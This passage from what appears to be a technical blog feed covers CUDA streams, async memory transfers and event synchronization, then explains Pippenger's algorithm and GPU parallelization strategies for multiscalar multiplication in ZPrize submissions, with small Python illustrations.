&lt;p&gt;We can see the function call takes almost no time, and the memcpy of the second chunk goes fast too. In the middle of both functions, the first memcpy takes most of the time, almost 1000 times more than the second one! Yet, the operation is the same. What’s going on?&lt;&#x2F;p&gt;
&lt;p&gt;The answer is kernels run concurrently with the host, and the program is only blocked when it needs the data. The memcpy is not taking that much time, but it’s the first function call that requires the result, so it has to wait for the device to finish.&lt;&#x2F;p&gt;
&lt;p&gt;To make it more evident, we will make use of another primitive:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaDeviceSynchronize();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;With this function, all the time is spent waiting for the device, and both memcpys take the same amount of time.&lt;&#x2F;p&gt;
&lt;p&gt;And knowing we can run code both in the GPU and the CPU simultaneously, we can further optimize our intensive application.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;multi-stream-code&quot;&gt;Multi-stream code&lt;&#x2F;h3&gt;
&lt;p&gt;Knowing what happens when we launch a kernel and try to run code locally, we could ask the following question: What happens if we launch multiple kernels simultaneously? Can they run in parallel too? What about memory transfers?&lt;&#x2F;p&gt;
&lt;p&gt;Let’s try to answer these questions.&lt;&#x2F;p&gt;
&lt;p&gt;Kernels and memcpy functions run sequentially in their stream. In the case we have seen before, there wasn’t an explicit mention of the stream, so the default stream is used.&lt;&#x2F;p&gt;
&lt;p&gt;But we can create additional streams with &lt;code&gt;cudaStreamCreate&lt;&#x2F;code&gt; and then assign kernels to them.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s see an example with two kernels:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaStream_t stream1, stream2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaStreamCreate(&amp;amp;stream1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaStreamCreate(&amp;amp;stream2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;foo&amp;lt;&amp;lt;&amp;lt;blocks,threads,0,stream1&amp;gt;&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;foo&amp;lt;&amp;lt;&amp;lt;blocks,threads,0,stream2&amp;gt;&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaStreamDestroy(stream1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaStreamDestroy(stream2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;With this, if one kernel is not enough to fully use the device, we can fill it up with many other tasks that we can run in parallel. If both kernels of the last example used 50% of the device, we would have full occupancy.&lt;&#x2F;p&gt;
&lt;p&gt;Since we have many kernels running, it is a good idea to use the async version of memcpy to start moving data as soon as it is ready.&lt;&#x2F;p&gt;
&lt;p&gt;For example:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaMemcpyAsync(&amp;amp;results1, &amp;amp;results_in_kernel1, AMOUNT_OF_ELEMENTS, cudaMemcpyDeviceToHost, stream1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaMemcpyAsync(&amp;amp;results2, &amp;amp;results_in_kernel2, AMOUNT_OF_ELEMENTS, cudaMemcpyDeviceToHost, stream2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Suppose the computation spends a lot of time transferring data between the device and the host. Async memory transfers can be done in parallel with kernel execution since the GPU supports transferring and computing at the same time.&lt;&#x2F;p&gt;
&lt;p&gt;If you want more examples of this, we have written a complete example in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;colab.research.google.com&#x2F;drive&#x2F;1SXZjOpb7t352VctCQ6xLhYZJCi2zCB_A?authuser=3#scrollTo=CA0_yYSxNB7p&amp;amp;line=5&amp;amp;uniqifier=1&quot;&gt;colab&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;synchronization-and-events&quot;&gt;Synchronization and Events&lt;&#x2F;h3&gt;
&lt;h4 id=&quot;how-do-we-synchronize-work&quot;&gt;How do we synchronize work?&lt;&#x2F;h4&gt;
&lt;p&gt;Within the host code, we can use different levels of synchronization. From more to less synchronization, some API calls we can use are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * We can synchronize everything using `cudaDeviceSynchronize()`, which blocks the host until all issued CUDA calls are complete;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * we can synchronize with respect to a specific stream using `cudaStreamSynchronize(stream)`, which blocks the host until all issued CUDA calls in `stream` are complete;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * or we can synchronize hosts or devices more selectively using **events**.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;events&quot;&gt;Events&lt;&#x2F;h4&gt;
&lt;p&gt;CUDA events provide a mechanism to signal when operations have occurred in a stream. They are helpful for profiling and synchronization.&lt;&#x2F;p&gt;
&lt;p&gt;Events have a boolean state: “Occurred” (which is the default state) or “Not Occurred”.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;managing-events-and-synchronizing-streams&quot;&gt;Managing events and synchronizing streams&lt;&#x2F;h4&gt;
&lt;p&gt;The most common ways to create, destroy, and enqueue events are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `cudaEventCreate(&amp;amp;event)` creates an `event`;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `cudaEventDestroy(event)` destroys an `event`;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `cudaEventRecord(event, stream)`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      * sets the `event` state to &amp;quot;Not Occurred&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      * enqueues the `event` into the given `stream`, and&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      * sets the `event` state to &amp;quot;Occurred&amp;quot; when it reaches the front of the `stream`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;How can we make sure that certain events have occurred before continuing execution?&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `cudaEventQuery(event)` returns `CUDA_SUCCESS` if `event` has occurred.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `cudaEventSynchronize(event)` blocks the host until `event` has occurred.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `cudaStreamWaitEvent(stream, event)`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      * blocks all launches on `stream` after this call until `event` occurs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      * does not block the host.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;CUDA allows us to speed up expensive calculations by distributing the load across the many cores of a GPU. To make the best use of these capabilities, we need to rethink how we carry out our calculations, looking for algorithms that can be easily parallelized (such as the fast Fourier transform). In this post, we reviewed the basics of CUDA: what threads and warps are, and how to manage streams and synchronize with events. GPUs offer tools to improve proving and verification times in zk-SNARKs, opening the door to many exciting applications. In future posts, we will cover more advanced CUDA topics.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>ZPrize: eyes on the prize</title>
          <pubDate>Mon, 23 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/eyes-on-the-prize/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/eyes-on-the-prize/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/eyes-on-the-prize/">&lt;h1 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h1&gt;
&lt;p&gt;This post contains a summary of different approaches to optimize multiscalar multiplication with CUDA, as presented for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.zprize.io&#x2F;blog&#x2F;announcing-zprize-results&quot;&gt;ZPrize&lt;&#x2F;a&gt;. This is an important calculation in certain &lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;proving systems&lt;&#x2F;a&gt; (zk-SNARKs), where it is necessary to add lots of points over an &lt;a href=&quot;&#x2F;multiscalar-multiplication-strategies-and-challenges&#x2F;&quot;&gt;elliptic curve&lt;&#x2F;a&gt;. These large sums can be broken down into smaller ones, each of which can be calculated in parallel by a processor, making the use of CUDA ideal to speed it up considerably. A short introduction to CUDA can be found &lt;a href=&quot;&#x2F;cuda-from-scratch&#x2F;&quot;&gt;here&lt;&#x2F;a&gt;. The results of the ZPrize are promising, leading to more than 2x speed up; and the good news does not stop there, since each solution introduces different tricks and strategies. Below you will find an overview of some solutions and the links to each repo.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;table-of-contents&quot;&gt;Table of Contents&lt;&#x2F;h2&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Goal&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Pippenger&amp;#39;s algorithm&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Base algorithm&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Speakspeak&amp;#39;s submission&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * 6block&amp;#39;s submission&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Mike Voronov and Alex Kolganov&amp;#39;s submission&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MatterLabs&amp;#39;s submission&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Yrrid&amp;#39;s submission&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;goal&quot;&gt;Goal&lt;&#x2F;h2&gt;
&lt;p&gt;Given $n\in\mathbb{N}$, elliptic curve points $P_1, \dots, P_n$ and scalars $k_1, \dots, k_n$ in a finite field, compute $$P=\sum_{i=1}^nk_iP_i$$&lt;&#x2F;p&gt;
&lt;p&gt;where the summation is understood in terms of ordinary &lt;a href=&quot;&#x2F;what-every-developer-needs-to-know-about-elliptic-curves&#x2F;&quot;&gt;elliptic curve addition&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The number of points is related to the number of constraints needed to represent the computation (which can be larger than 100,000,000). This calculation appears, for example, when we want to compute the commitment of a polynomial \( a_0+a_1x+a_2x^2+\dots+a_dx^d \) using the Kate-Zaverucha-Goldberg (KZG) commitment scheme.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;pippenger-algorithm&quot;&gt;Pippenger algorithm&lt;&#x2F;h2&gt;
&lt;p&gt;Let $\lambda$ be the number of bits needed to store the scalars, and let $s$ be an integer between $1$ and $\lambda$. Denote by $\lceil \lambda&#x2F;s \rceil$ the ceiling of $\lambda&#x2F;s$, that is the least integer number greater than or equal to $\lambda&#x2F;s$.&lt;&#x2F;p&gt;
&lt;p&gt;Write each scalar $k_i$ in base $2^s$&lt;br &#x2F;&gt;
$$k_i = \sum_{j=0}^{\lceil \lambda&#x2F;s \rceil-1}m_{i,j}(2^{s})^j,$$&lt;br &#x2F;&gt;
where $0 \leq m_{i,j} &amp;lt; 2^s$. Then&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum_{i=1}^n k_iP_i = \sum_{i=1}^n\sum_{j}m_{i,j}2^{sj}P_i = \sum_{j=0}^{\lceil \lambda&#x2F;s \rceil-1}2^{sj}(\sum_{i=1}^n m_{i,j}P_i).$$&lt;&#x2F;p&gt;
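&lt;p&gt;To make the decomposition concrete, here is a small Python sketch (our own illustration over plain integers, not part of any submission): splitting a scalar into base-$2^s$ digits and recombining them recovers the scalar.&lt;&#x2F;p&gt;

```python
# Toy illustration of the base-2^s digit decomposition used by Pippenger.
# The names (window size s, digits m_j) follow the text; this is a sketch
# over plain Python integers, not real field arithmetic.

def digits_base_2s(k: int, s: int, num_windows: int) -> list[int]:
    """Return m_0, ..., m_{num_windows-1} with k = sum_j m_j * 2**(s*j)."""
    mask = (1 << s) - 1
    return [(k >> (s * j)) & mask for j in range(num_windows)]

# Recombining the digits recovers the scalar.
k, s = 0b1011_0110_1110, 4
ms = digits_base_2s(k, s, 3)
assert sum(m << (s * j) for j, m in enumerate(ms)) == k
```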
&lt;p&gt;Let us rewrite the inner sum differently. For each $1 \leq m &amp;lt; 2^s$ we can group all the terms of the inner sum that have $m_{i,j}=m$ and write&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum_{i=1}^nm_{i,j}P_i = \sum_{m=1}^{2^s-1}m\left(\sum_{i:\,m_{i,j}=m}P_i\right)$$&lt;&#x2F;p&gt;
&lt;p&gt;For the elements $m$ such that there is no $i$ with $m_{i,j}=m$, we interpret the sum $\sum_{i:\,m_{i,j}=m}P_i$ as $0$. This last step is called &lt;em&gt;bucketing&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Putting it all together we obtain:&lt;br &#x2F;&gt;
$$\sum_{i=1}^nk_iP_i = \sum_{j=0}^{\lceil \lambda&#x2F;s \rceil - 1}2^{sj}\sum_{m=1}^{2^s-1}m\sum_{i:\,m_{i,j}=m}P_i \tag{1}$$&lt;br &#x2F;&gt;
Pippenger’s algorithm consists of computing the sums above starting from the innermost sum:&lt;&#x2F;p&gt;
&lt;p&gt;(1) For each $j$ and $m$ compute $B_{j,m} := \sum_{i:\,m_{i,j}=m}P_i$.&lt;&#x2F;p&gt;
&lt;p&gt;(2) For each $j$ compute $G_j := \sum mB_{j,m}$ as follows. For all $1 \leq m &amp;lt; 2^s$ compute the partial sums in descending order of the indices&lt;br &#x2F;&gt;
$$S_{j,m} = B_{j,2^s-1} + \cdots + B_{j,m}.$$&lt;br &#x2F;&gt;
Then compute the sum of the partial sums $S_{j,1} + \cdots + S_{j,2^s-1}$. This is equal to the sum $G_j$ we want.&lt;&#x2F;p&gt;
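&lt;p&gt;The partial-sum trick replaces the scalar multiplications $mB_{j,m}$ with additions only. A minimal Python sketch (integers stand in for elliptic curve points, so &amp;quot;point addition&amp;quot; is just integer addition):&lt;&#x2F;p&gt;

```python
# Step (2) bucket reduction: sum(m * B[m]) computed with only additions,
# via partial sums taken in descending index order.

def bucket_reduce(B: list[int]) -> int:
    """Given buckets B[1..M] (B[0] unused), return sum(m * B[m])."""
    total = 0      # running partial sum S_m = B[M] + ... + B[m]
    result = 0     # running sum of the partial sums
    for m in range(len(B) - 1, 0, -1):
        total += B[m]
        result += total
    return result

B = [0, 5, 7, 1, 9]  # buckets for m = 1..4
assert bucket_reduce(B) == sum(m * B[m] for m in range(1, 5))
```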
&lt;p&gt;(3) Compute&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum_{j=0}^{\lceil \lambda&#x2F;s \rceil-1}2^{sj}G_j.$$&lt;&#x2F;p&gt;
&lt;p&gt;In pseudocode (extracted from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1321.pdf&quot;&gt;this paper&lt;&#x2F;a&gt;):&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;vXGaugg.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
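&lt;p&gt;The three steps above can be sketched in a few lines of Python. This is our own toy model, not any submission’s code: integers mod $p$ stand in for curve points, and step (3) is folded Horner-style over the windows, which is equivalent to computing $\sum_j 2^{sj}G_j$.&lt;&#x2F;p&gt;

```python
# A compact sketch of Pippenger's algorithm over a toy group: "points"
# are integers mod p, so the true answer is just sum(k_i * P_i) mod p.

def pippenger(ks: list[int], Ps: list[int], s: int, lam: int, p: int) -> int:
    num_windows = -(-lam // s)                # ceil(lambda / s)
    acc = 0
    for j in reversed(range(num_windows)):    # Horner-style over windows
        # Step (1): bucket the points of window j.
        B = [0] * (1 << s)
        for k, P in zip(ks, Ps):
            m = (k >> (s * j)) & ((1 << s) - 1)
            if m:
                B[m] = (B[m] + P) % p
        # Step (2): G_j = sum(m * B[m]) via descending partial sums.
        total = G = 0
        for m in range((1 << s) - 1, 0, -1):
            total = (total + B[m]) % p
            G = (G + total) % p
        # Step (3): fold in with s doublings per window (acc * 2^s + G_j).
        acc = ((acc << s) + G) % p
    return acc

p = 1_000_003
ks = [123456, 7891011, 4242, 999999]
Ps = [11, 22, 33, 44]
assert pippenger(ks, Ps, s=5, lam=23, p=p) == sum(k * P for k, P in zip(ks, Ps)) % p
```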
&lt;h2 id=&quot;base-algorithm&quot;&gt;Base algorithm&lt;&#x2F;h2&gt;
&lt;p&gt;The implementation is in &lt;code&gt;algorithms&#x2F;src&#x2F;msm&#x2F;variable_base&#x2F;&lt;&#x2F;code&gt;. It is specific to the BLS12-377 curve. For this curve, we have $\lambda=253$.&lt;&#x2F;p&gt;
&lt;p&gt;Aleo uses Pippenger’s algorithm with $s=1$. Equation $(1)$ reduces to&lt;br &#x2F;&gt;
$$\sum_{i=1}^nk_iP_i = \sum_{j=0}^{\lambda - 1}2^{j}\sum_{i:\,m_{i,j}=1}P_i,$$&lt;br &#x2F;&gt;
where $m_{i,j}$ are defined as before; in this particular case $m_{i,j}$ coincides with the $j$-th bit of $k_i$.&lt;br &#x2F;&gt;
Step 1 of Pippenger’s algorithm is trivial for this particular choice of $s$, and we get $G_j = B_{j,1}.$&lt;&#x2F;p&gt;
&lt;h4 id=&quot;parallelization-strategy&quot;&gt;Parallelization strategy&lt;&#x2F;h4&gt;
&lt;p&gt;CUDA parallelization is only used to modify step 2 as follows.&lt;&#x2F;p&gt;
&lt;p&gt;(2) The goal is to compute $G_{j} = \sum_{i:\,m_{i,j}=1}P_i$ for all $j$. For that, the following steps are performed.&lt;&#x2F;p&gt;
&lt;p&gt;(2.a) First, compute&lt;&#x2F;p&gt;
&lt;p&gt;$$G_{j, a} = \sum_{\substack{i:\,m_{i,j}=1 \\ 128a\leq i &amp;lt; 128(a+1)}}P_i$$&lt;&#x2F;p&gt;
&lt;p&gt;for all $0 \leq a &amp;lt; \lceil n&#x2F;128 \rceil$ and all $j$ in parallel. That is done using $\lambda * \lceil n&#x2F;128 \rceil$ threads.&lt;&#x2F;p&gt;
&lt;p&gt;(2.b) Then for each $j$ compute $G_{j}$ by adding $G_{j,a}$ over all $a$. Each $j$ gets its own thread, so this step uses $\lambda$ threads, and each thread adds $\lceil n&#x2F;128\rceil$ elliptic curve points.&lt;&#x2F;p&gt;
&lt;p&gt;Once all the $G_j$ are computed the rest of the Pippenger algorithm is executed in the CPU as in the previous section.&lt;&#x2F;p&gt;
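&lt;p&gt;The two-stage split of step (2) can be sketched sequentially in Python (our own illustration; on the GPU the per-chunk sums of step (2.a) run in parallel, and integers stand in for points):&lt;&#x2F;p&gt;

```python
# Baseline step (2) for one window j: accumulate per-chunk sums G_{j,a}
# over chunks of 128 points (step 2.a), then add the chunks (step 2.b).

def window_sum_chunked(bits: list[int], Ps: list[int], chunk: int = 128) -> int:
    # bits[i] is m_{i,j} in {0,1}; G_j = sum of P_i with bits[i] == 1.
    partials = []
    for a in range(0, len(Ps), chunk):                     # step (2.a)
        partials.append(sum(P for b, P in zip(bits[a:a + chunk], Ps[a:a + chunk]) if b))
    return sum(partials)                                   # step (2.b)

Ps = list(range(1, 301))
bits = [i % 2 for i in range(300)]
assert window_sum_chunked(bits, Ps) == sum(P for b, P in zip(bits, Ps) if b)
```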
&lt;h2 id=&quot;speakspeak&quot;&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;z-prize&#x2F;2022-entries&#x2F;tree&#x2F;main&#x2F;open-division&#x2F;prize1-msm&#x2F;prize1a-msm-gpu&#x2F;speakspeak&quot;&gt;Speakspeak&lt;&#x2F;a&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;The article is “cuZK: Accelerating Zero-Knowledge Proof with A Faster Parallel Multi-Scalar Multiplication Algorithm on GPUs” and can be found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1321.pdf&quot;&gt;here&lt;&#x2F;a&gt;. There are differences between what the paper describes and the actual implementation in the ZPrize submission.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;parallelization-strategy-described-in-the-paper&quot;&gt;Parallelization strategy described in the paper&lt;&#x2F;h4&gt;
&lt;p&gt;The strategy here is to change steps 1 and 2 of Pippenger’s algorithm to leverage GPU parallelization.&lt;&#x2F;p&gt;
&lt;p&gt;We use the notation introduced in the &lt;strong&gt;Pippenger’s algorithm&lt;&#x2F;strong&gt; section. Let $t$ be the number of threads to be used.&lt;&#x2F;p&gt;
&lt;p&gt;(1) Compute $B_{j,m}$ as follows. For each $0 \leq j &amp;lt; \lceil \lambda &#x2F; s \rceil$:&lt;&#x2F;p&gt;
&lt;p&gt;(1.a) compute $m_{i,j}$ in parallel for all $i$ using all $t$ threads.&lt;&#x2F;p&gt;
&lt;p&gt;(1.b) For each $0\leq l &amp;lt; t$ compute&lt;&#x2F;p&gt;
&lt;p&gt;$$B_{j,m,l} := \sum_{\substack{i \text{ such that } m_{i,j}=m \\ i \equiv l \text{ mod } t}}P_i$$&lt;&#x2F;p&gt;
&lt;p&gt;Use all $t$ threads for it.&lt;&#x2F;p&gt;
&lt;p&gt;(1.c) Let $M^{(j)}$ be the matrix with elliptic curve point entries such that $M_{m, l}^{(j)} = B_{j,m,l}$. This is a sparse matrix. Compute $B_{j,m} = M^{(j)}\cdot 1_t$, where $1_t$ is the vector of length $t$ with all entries equal to $1$. This can be done using existing parallel algorithms for sparse matrix-vector multiplications. Use all $t$ threads for it.&lt;&#x2F;p&gt;
&lt;p&gt;(2) Compute all $G_j$ as follows. For all $0\leq j &amp;lt; \lceil \lambda &#x2F; s \rceil$ do the following in parallel using $t’ := t&#x2F;\lceil \lambda &#x2F; s \rceil$ threads for each one.&lt;&#x2F;p&gt;
&lt;p&gt;(2.a) For a given $j$, to compute $G_j = \sum mB_{j,m}$, split the sum into $t’$ even chunks and compute each one separately in its own thread. That is, if we denote $\sigma=(2^s-1)&#x2F;t’$, for each $0 \leq \xi &amp;lt; t’$ compute&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum_{m=\xi\sigma}^{(\xi+1)\sigma-1}mB_{j,m}.$$&lt;&#x2F;p&gt;
&lt;p&gt;This can be done with the same partial sum trick as in step 2 of Pippenger. An additional step is needed in this case because the sequence of coefficients in the sum above is $\xi\sigma, \xi\sigma+1, \dots$ instead of $1, 2, 3,\dots$. But that is easily fixed by adding $(\xi\sigma-1)$ times the largest partial sum.&lt;&#x2F;p&gt;
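&lt;p&gt;A small Python sketch of this offset chunk reduction (our own toy model with integers in place of curve points): the descending partial sums give $\sum (m-a+1)B_m$, and adding $(a-1)$ copies of the largest partial sum restores the true coefficients.&lt;&#x2F;p&gt;

```python
# Chunked bucket reduction: sum(m * B[m]) for m in [a, b) via descending
# partial sums, plus (a - 1) copies of the largest partial sum to
# account for the offset start of the coefficient sequence.

def chunk_reduce(B: dict[int, int], a: int, b: int) -> int:
    total = 0   # partial sum S_m = B[b-1] + ... + B[m]
    acc = 0     # sum of the partial sums
    for m in range(b - 1, a - 1, -1):
        total += B.get(m, 0)
        acc += total
    return acc + (a - 1) * total   # total == S_a, the largest partial sum

B = {m: (m * 7) % 11 for m in range(8, 16)}
assert chunk_reduce(B, 8, 16) == sum(m * v for m, v in B.items())
```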
&lt;p&gt;(2.b) Add all the chunks of the previous step. The result is $G_j$.&lt;&#x2F;p&gt;
&lt;p&gt;Finally compute step 3 as in Pippenger.&lt;&#x2F;p&gt;
&lt;p&gt;In pseudocode:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;meWCE2d.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;TdZi4gO.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;parallelization-strategy-from-the-implementation&quot;&gt;Parallelization strategy from the implementation&lt;&#x2F;h3&gt;
&lt;p&gt;The parallelization strategy in the actual code of the submission is considerably simpler: there is no optimization with sparse matrix multiplications. However, there are several interesting things to note.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Only the curve BLS12-377 is supported.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The window size $s$ is chosen to be $21$. Since $\lambda = 253 = 12 * 21 + 1$, there are 13 windows, one of which has only binary scalars. This last window is treated differently from the other 12 windows. This is an odd choice given that $253 = 11 * 23$, which would give 11 equal windows of size 23.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * All the memory to store the inputs, the results, and all the partial results in between is allocated at the beginning. This needs quite a lot of memory: about 3.2GB of GPU RAM is needed just to store the scalars of all windows in the case of $2^{26}$ base points.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * For the most part (first 12 windows) kernels are launched with grids of blocks of $12$ columns and $M$ rows, where $M$ varies according to the task. Blocks on the other hand are one dimensional of size 32 and therefore warps and blocks coincide. Each column then handles computations relative to a specific window.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * There is intensive use of the `cub` [library](https:&#x2F;&#x2F;nvlabs.github.io&#x2F;cub&#x2F;index.html#sec1) for [sorting](https:&#x2F;&#x2F;nvlabs.github.io&#x2F;cub&#x2F;structcub_1_1_device_radix_sort.html), computing [run lengths](https:&#x2F;&#x2F;nvlabs.github.io&#x2F;cub&#x2F;structcub_1_1_device_run_length_encode.html), computing [cumulative sums](https:&#x2F;&#x2F;nvlabs.github.io&#x2F;cub&#x2F;structcub_1_1_device_scan.html) and [filtering](https:&#x2F;&#x2F;nvlabs.github.io&#x2F;cub&#x2F;structcub_1_1_device_select.html) lists.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
